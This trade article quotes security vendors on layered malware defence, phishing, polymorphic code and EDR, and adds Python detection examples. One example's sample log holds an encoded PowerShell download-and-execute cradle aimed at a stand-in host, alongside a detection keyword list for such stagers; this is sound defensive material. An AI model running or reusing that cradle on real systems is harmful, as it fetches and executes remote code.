Combating malware means going way beyond locating suspicious programs on servers and workstations, and detecting and interfering with the use of malware on the network.
All too often, organisations make the mistake of treating malware infections as a series of independent occurrences. Worst-case scenario? A malicious program is discovered and IT simply cleans it up or rebuilds the affected host... and then moves on with routine operational tasks. That is just not good enough for any business that wants to stay secure. Such an ad hoc approach fails to protect an enterprise from the increasingly aggressive and innovative attack tactics now employed by malware authors. It is their stock in trade to design malware that bypasses defences, evades detection and resists the most stringent efforts to remove it. As Stuart Brown, principal solutions architect at Redcentric, points out, a new approach is required that prevents malware entering your network or, at the very least, enables you to detect it at the point of entry.
"People call this the 'kill chain' of an advanced persistent threat (APT) and you need to take a holistic approach to security defence, rather than a series of discrete solutions," he advises. "For security technology to work, it needs to cover three essential elements: it needs to be able to detect malware entering the organisation; it needs to detect malware traffic traversing across the internal network; and then it needs to detect malware on the way out.
"In the past, companies have simply added appliances to the network that deal with each of these in isolation," he adds. "It's likely any one organisation will have a combination of firewalls, virus protection and intrusion detection amongst other security solutions. For many, the answer to a raised threat has been to simply stick another security appliance on the network."
These traditional approaches, however, have become limited as malware becomes more sophisticated. "First, each appliance sits in isolation. They're typically provided by different manufacturers and rarely are they capable of integrating. This limits the visibility and control that the IT team has over what is really happening on their network. This lack of visibility often results in the IT team having to check each individual log or report of each device to identify if there's a problem."
Some appliances also provide a blanket approach that doesn't allow for the nuances of malware. "For example, most network firewalls are traditional port- and protocol-based. This means that the firewall is programmed to let in a certain type of traffic that comes via a port - let's say https (encrypted) traffic via port 443. That means all traffic via port 443 is allowed in - whether it's good or bad. The firewall doesn't check traffic to see what it is. It's just as likely to be a piece of malware dressed up as an https request as it is to be genuine https traffic. And as malware has moved away from social applications and is more often embedded in business critical applications, it's now more difficult to protect against," Brown points out.
What we need in the fight against the APT kill chain is a new capability: 'loop protection'. This takes all of the tools available to a security team - firewalls, malware and APT detection, real-time analysis (sandboxing), endpoint protection, correlated log analysis and others - and combines them. This type of closed-loop protection is available through next-generation firewalls (NGFW): a single box that sees all traffic, identifies whether it is encrypted and which port and protocol it uses, and scans it in real time for malware and APT activity. If it is concerned about a piece of traffic, it then runs it through a virtual machine to see what it does and what its impact is. This is known as sandboxing.
"If it identifies the traffic as malware, it will apply an automated response, based on a set of rules that you've pre-determined. This 'spot, prove, react, prompt' reaction all happens in real time. This means you're protected before you know that there's an issue."
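As an added illustration of the port-versus-content point made above (example code written for this page, not part of the article or of any vendor's product): a port-based rule allows everything on port 443, while a content-aware check classifies the first bytes of each flow and routes mismatches for deeper inspection, the "spot" step of the spot, prove, react loop. The flows, addresses, allow list and the allow/inspect policy are constructed for the example.

```python
"""Port-based vs. content-aware traffic decisions (added example, not from the article)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    dport: int
    first_bytes: bytes  # first bytes the client sent on the connection


# Assumed policy: only web ports are open, and each port has an expected protocol.
ALLOWED_PORTS = {80, 443}
EXPECTED_PROTOCOL = {80: "http", 443: "tls"}
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ")


def port_based_verdict(flow: Flow) -> str:
    """The traditional rule: the port decides, the payload is never looked at."""
    return "allow" if flow.dport in ALLOWED_PORTS else "deny"


def classify_payload(data: bytes) -> str:
    """Cheap protocol identification from the leading bytes of the payload."""
    # TLS record header: content type 0x16 (handshake), version major byte 0x03.
    if len(data) >= 3 and data[0] == 0x16 and data[1] == 0x03 and data[2] <= 0x04:
        return "tls"
    if any(data.startswith(m) for m in HTTP_METHODS):
        return "http"
    return "unknown"


def content_aware_verdict(flow: Flow) -> tuple:
    """Allow only when the payload matches what the port is meant to carry."""
    if flow.dport not in ALLOWED_PORTS:
        return ("deny", "port not in allow list")
    seen = classify_payload(flow.first_bytes)
    expected = EXPECTED_PROTOCOL[flow.dport]
    if seen == expected:
        return ("allow", f"{seen} on port {flow.dport}, as expected")
    # Spot: port and payload disagree. Prove: hand the flow to deeper analysis.
    return ("inspect", f"{seen} payload on port {flow.dport}, expected {expected}")


# Constructed sample flows (addresses and payloads invented for the example).
SAMPLE_FLOWS = [
    Flow("10.0.0.5", 443, b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"),  # TLS ClientHello prefix
    Flow("10.0.0.7", 443, b"GET /update.bin HTTP/1.1\r\nHost: 203.0.113.9\r\n"),  # plaintext HTTP on 443
    Flow("10.0.0.9", 443, b"\x00\x00\x00\x2a\x7f\x01\x00\x00"),  # neither TLS nor HTTP
    Flow("10.0.0.11", 80, b"\x16\x03\x03\x00\x40"),  # TLS where plaintext HTTP is expected
    Flow("10.0.0.13", 8443, b"\x16\x03\x01\x00\x10"),  # port not in the allow list
]


def compare(flows) -> list:
    """Side-by-side verdicts: (src, port, port-based, content-aware)."""
    return [(f.src, f.dport, port_based_verdict(f), content_aware_verdict(f)[0]) for f in flows]


if __name__ == "__main__":
    for src, port, by_port, by_content in compare(SAMPLE_FLOWS):
        print(f"{src:>10} :{port:<5} port-based={by_port:<6} content-aware={by_content}")
```

The port-based column allows all four flows on 443 and 80, exactly as the quote describes; the content-aware column allows only the genuine TLS flow and sends the three mismatches on to inspection. Real NGFWs do this classification with far richer signatures, but the decision structure is the same.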
THINK ABOUT LAYERS!
"No organisation should rely solely on a single vendor solution. The reality is that each vendor may do well in a particular aspect but no single technology or product can ever offer a completely bulletproof solution to every threat," comments David Peters, technical director for ANSecurity. "This is a more prevalent issue now that attackers are using exploits designed to bypass detection methods used by specific vendors. We always advise clients to think about multiple layers of complementary solutions that overlap slightly to provide a belt and braces approach.
"Simply having a security product deployed is not the end of the story. In many instances, when we are called in as security consultants post breach, our analysis uncovers a specific security product that may have been improperly configured, unpatched or simply not evolved with changes in the environment exposing a vulnerability that has been exploited. We recommend that organisations take an active approach with regular security system, training and process evaluations to keep pace with internal changes and external threats."
Since the first mass-market malware, the security industry has been in an "ongoing arms race" between attackers and defenders, Peters continues. "The types of attacks, the scope and scale of vulnerabilities, corresponding exploits and even distribution methods have kept pace with technological progress. This cycle is unfortunately never ending and malware for profit has grown into a multibillion dollar industry. New approaches to delivering malware whilst evading detection are constantly evolving, along with the malware itself. Organisations need to continually re-evaluate sources of malware, a process that can be streamlined with certain security tools, but administrators need to keep up to date with new threat vectors and routinely test that the defences are set up to deal with the next wave of attacks."
SOPHISTICATED AND BELIEVABLE
John Wilson, field CTO, Agari, points to how, in the last five years, we've become far too familiar with the social engineering tactics and spam messages that hackers use to spoof a company's domain and attempt to infect our computers with malware. "Advances in phishing and social engineering techniques that carry malware have come on leaps and bounds," he says. "Phishing attempts are no longer primitive and full of errors; they have become sophisticated and believable, making it almost impossible to identify that something is amiss. Email-borne malware attacks can vary greatly in form and content, with the malware either included as an attachment or embedded in a link. Malware distributors often keep the content as minimal as possible, trying to drive a click on the attachment or to their URL."
Brand-conscious organisations that want to use email to communicate with consumers need to ensure it is a secure channel, so that their brand is not used to trick consumers into infecting their devices with malware. "Companies must take the proper steps to prevent phishing emails supposedly coming from their brand, containing malicious links or attachments. Not only do phishing emails have a detrimental effect on the recipient, but also on the brand that the email has come from, whose reputation will become tarnished in the process," states Wilson.
Open standards like Domain-based Message Authentication, Reporting and Conformance (DMARC) are emerging that allow savvy businesses to combat email vulnerability and remove the risk of an email containing malware ever reaching the intended recipient - their customers. "Those businesses that take this responsibility seriously and secure their email channel will soon benefit from greater consumer trust, fewer fraud losses, lower operational overheads and a significantly reduced chance of their customers being victim to this latest threat," he adds.
Slawek Ligier, vice president of product development, Barracuda Networks, stresses how, as mass distribution started becoming less effective, malware developers created polymorphic code. "Although the mechanism used by the malware to achieve its objectives was the same, the file itself was slightly different each time it was sent. This resulted in a different signature and successful infiltration."
Changing malware from a widely distributed single file to something that changes just slightly for each payload is relatively easy, he says. "Creating malware that can evade all known defence mechanisms, stay undetected for a long period of time and achieve a more specific objective is far more challenging. But, as hard as it is to write advanced malware, it is significantly harder to detect these threats. Security software must avoid both false positives and false negatives - crying wolf too many times results in alarms being ignored. Since signature comparison is no longer sufficient, defenders must deploy Advanced Threat Detection technologies, such as sandboxing, network cloaking and monitoring, to either stop malware from entering an organisation or to detect it before the damage is done."
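An added example, not from the article or from Barracuda, of the "different signature" problem described in the two paragraphs above: a byte-exact hash misses a file that differs in a few bytes, while invariant strings (the YARA approach) or byte n-gram similarity still match it, and neither fires on an unrelated file. The toy "samples" are constructed plain-text byte strings, not real malware, and the 0.5 similarity threshold is an arbitrary choice for the demonstration.

```python
"""Exact signatures vs. invariant features on slightly altered files (added example, not from the article)."""
import hashlib


def byte_ngrams(data: bytes, n: int = 4) -> set:
    """Set of overlapping n-byte windows: an order-insensitive view of the content."""
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def jaccard(a: set, b: set) -> float:
    return 1.0 if not a and not b else len(a & b) / len(a | b)


def exact_hash_match(known: bytes, sample: bytes) -> bool:
    """Classic signature: the whole-file hash must be identical."""
    return hashlib.sha256(known).digest() == hashlib.sha256(sample).digest()


def string_rule_match(sample: bytes, required: tuple) -> bool:
    """YARA-style rule: every invariant byte string must be present."""
    return all(s in sample for s in required)


def similarity_match(known: bytes, sample: bytes, threshold: float = 0.5) -> bool:
    """Fuzzy match on shared 4-grams; the threshold is chosen for the demo."""
    return jaccard(byte_ngrams(known), byte_ngrams(sample)) >= threshold


# Constructed toy samples (plain text, not real malware): a shared functional core
# wrapped in a variable region that changes from copy to copy.
CORE = b"[stage1]beacon=hxxp://c2.example.invalid/check;sleep=300;exec=run_payload"
KNOWN_SAMPLE = b"JUNK:0a1b2c3d4e;" + CORE + b";pad=xxxxxx"
ALTERED_COPY = b"JUNK:9f8e7d6c5b4a3;" + CORE + b";pad=yy"
BENIGN_FILE = b"Quarterly sales report: region=EMEA; total=1234; prepared by finance"

# Invariant strings a defender would pull from the known sample.
RULE_STRINGS = (b"[stage1]", b"c2.example.invalid", b"exec=run_payload")


def detect(sample: bytes) -> dict:
    """Run all three detection methods against the known sample."""
    return {
        "sha256": exact_hash_match(KNOWN_SAMPLE, sample),
        "strings": string_rule_match(sample, RULE_STRINGS),
        "similarity": similarity_match(KNOWN_SAMPLE, sample),
    }


if __name__ == "__main__":
    for label, sample in (("known", KNOWN_SAMPLE), ("altered", ALTERED_COPY), ("benign", BENIGN_FILE)):
        print(label, detect(sample))
```

The altered copy is exactly the case Ligier describes: same mechanism, different file, different hash. The invariant-string and similarity checks catch it because they key on what the file must contain to work rather than on its exact bytes; the benign file scores false on all three, which is the false-positive side of the trade-off he mentions.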
As always, protecting all threat vectors is the best answer that organisations have to reduce the probability of being infected. "It starts with the protection of infiltration vectors - email, web, file transfer and USB. It continues with protection and detection at the endpoint, and detection of network anomalies - exploration, suspicious file transfers, communication with suspicious command and control servers etc.," Ligier adds. "Finally, any really valuable assets should be encrypted and keys stored securely. This way, even when the network is infiltrated and the event goes undetected, the damage is limited.
"In my experience, malware developers tend to experiment with a lot of different methods and attack vectors before discovering the best approach. True advanced targeted attacks rely on a series of techniques, in order to be successful. They combine social engineering with computer science. We are currently seeing a lot of very targeted phishing attempts. In the past, they were more direct, with links or attachments in the very first message.
"Modern email gateways are able to stop the majority of these, which has forced hackers to adopt a more subtle approach. They might start with completely innocent emails not asking for any action, just a response. Once trust is established, more detailed conversation and a request to take action follows. These types of attacks are very difficult to stop early. Only when the victim is about to be compromised, can security software come into play."
GAIN AND PROFIT
Thomas Fischer, principal threat researcher, Digital Guardian, also stresses how what has changed significantly of late is the methods that attackers use to deliver malware, necessitated by improvements in user awareness and detection. "We are seeing more targeted malware attacks for gain and profit, versus the general nuisance malware of the past. Malware is also now delivered in multiple stages and vectors, so we might see an endpoint being compromised by both an exploit kit (to gain remote access) and ransomware simultaneously," he says.
The other area seeing rapid growth is attacks on non-traditional target platforms, such as mobile phones, MacOS, PCS (production control systems) and PoS (Point of Sale). This, he points out, comes back to the ability to exploit for financial gain. So, what can be done to protect against these new types of attack? "User awareness is key. The more we train users to properly identify good versus bad attachments and websites, the less effective attacks will be. On the infrastructure front, organisations should adopt multi-layered security approaches, using network, application and endpoint security solutions. Implementing tried and tested DRP policies and backup strategies will also help to avoid significant loss of data and ensure data is recoverable, in the event of a ransomware attack."
What does the future hold? "We will continue to see malware evolve its methods of evasion, as businesses continue to invest in traditional detection methods. Memory-based malware will become more common, using built-in tools, such as PowerShell, to deliver them. The use of remote shells and control to remain undetected will be a big factor.
"Evasion techniques will also continue to improve with increased use of encryption, alongside implementation of sandbox detection to defeat solutions like FireEye, Cylance and Carbon Black," Fischer predicts. "Furthermore, the increased use of low-level hardware attacks will grow. By infecting BIOS, firmware and hard drives, the attackers are able to obtain longer persistence for their attacks."
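An added example, not from the article or from Digital Guardian, of what detecting the memory-based, PowerShell-delivered malware Fischer predicts can look like in practice: a check over process-creation log lines that flags PowerShell launches with the combination of flags typical of in-memory loaders, decoding an `-EncodedCommand` payload so the script body itself can be scanned. The log format, hostnames, indicator list and the "two indicators" alert threshold are assumptions made for the example; the sample lines are constructed.

```python
"""Flagging encoded PowerShell launches in process-creation logs (added example, not from the article)."""
import base64
import re

# Launch flags often seen when PowerShell is used as an in-memory loader.
FLAG_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I),
    "bypass_policy": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I),
}
# Script-body keywords typical of download-and-run stagers (assumed list for the example).
BODY_KEYWORDS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                 "frombase64string", "invoke-webrequest")


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as base64 of UTF-16LE text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse_command(cmd: str) -> dict:
    """Collect launch-flag and body indicators for one command line."""
    indicators = []
    decoded = ""
    for name, pattern in FLAG_PATTERNS.items():
        match = pattern.search(cmd)
        if match:
            indicators.append(name)
            if name == "encoded_command":
                decoded = decode_encoded_command(match.group(1))
    body = (decoded or cmd).lower()
    indicators += [f"keyword:{k}" for k in BODY_KEYWORDS if k in body]
    # Require two independent indicators so a lone -ExecutionPolicy Bypass stays quiet.
    return {"decoded": decoded, "indicators": indicators, "suspicious": len(indicators) >= 2}


def analyse_log(lines) -> list:
    """Return (host, analysis) for each line carrying a cmd= field."""
    results = []
    for line in lines:
        if "cmd=" not in line:
            continue
        host = re.search(r"host=(\S+)", line)
        results.append((host.group(1) if host else "?",
                        analyse_command(line.split("cmd=", 1)[1])))
    return results


def encode_for_sample(script: str) -> str:
    """Helper used only to build the constructed sample line below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed log lines in an assumed key=value format.
SAMPLE_LOG = [
    "2024-03-01T09:12:03Z host=ws01 user=alice cmd=powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1",
    "2024-03-01T09:15:41Z host=ws07 user=bob cmd=powershell.exe -nop -w hidden -enc "
    + encode_for_sample("IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/a')"),
    "2024-03-01T09:16:02Z host=ws09 user=carol cmd=powershell.exe -ExecutionPolicy Bypass -Command Get-Process",
]

if __name__ == "__main__":
    for host, result in analyse_log(SAMPLE_LOG):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{host}: {flag} {result['indicators']}")
```

Only the ws07 line trips the check: a hidden window plus an encoded command whose decoded body is a download-and-execute cradle. The scheduled script on ws01 and the single `-ExecutionPolicy Bypass` on ws09 stay below the threshold, which is the false-positive budget such a rule needs if it is to be acted on rather than ignored.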
Many organisations today lack the resources to conduct adequate forensics, once an infected system has been detected, states Scott Gainey, SVP & CMO, SentinelOne. "As a result, these initial discoveries (if detected at all) are often obscured in a long list of tasks managed by teams who lack both the staff and the tools to conduct a reasonable analysis. In the end, organisations often miss crucial signs that might indicate the existence of a much larger, more aggressive campaign. For over a decade, the security industry sat largely idle while cyber criminals and nations perfected new attack techniques," he comments.
More recently, the security industry began to mobilise in order to address this issue. "The focus initially began within the network, bringing to market a powerful set of new technologies, such as the next-generation firewall and network-based sandboxing aimed at detecting and preventing malicious activities that used more advanced obfuscation techniques to remain hidden.
"These new technologies proved valuable at reducing an organisation's attack surface and improving the overall catch rates of new threats," says Gainey. "In the last two years, another major segment of the industry began to mobilise to address a major pain point at the endpoint. Even with these powerful new advancements within the network, organisations' endpoints still remained highly vulnerable to attack. This new mobilisation began with improved visibility and response mechanisms locally, bringing what Gartner refers to as endpoint detection and response (EDR) to quickly surface any activities that might be malicious in nature. Initially, EDR was positioned as a supplement to traditional antivirus. This was based on the viewpoint that antivirus had fallen woefully behind the cyber threat landscape and could no longer prevent the more sophisticated threats. The EDR market has since evolved, with new integrated platforms that offer combined threat detection, prevention and response capabilities."
Collectively, these technology advancements provide significant opportunity for organisations to accelerate the detection and prevention of advanced, targeted attacks, he warns. "Now the onus sits with the organisations to streamline their security operations to take advantage of these new tools. Increase the use of automation to capture and eliminate the threats that constitute basic noise. Free the organisation to focus their time and energy on the critical 1%, and foster teaming with regular exercises to ensure adequate and proper response to severe incidents," he counsels.
Here is a link to the article: http://tinyurl.com/hhnk8go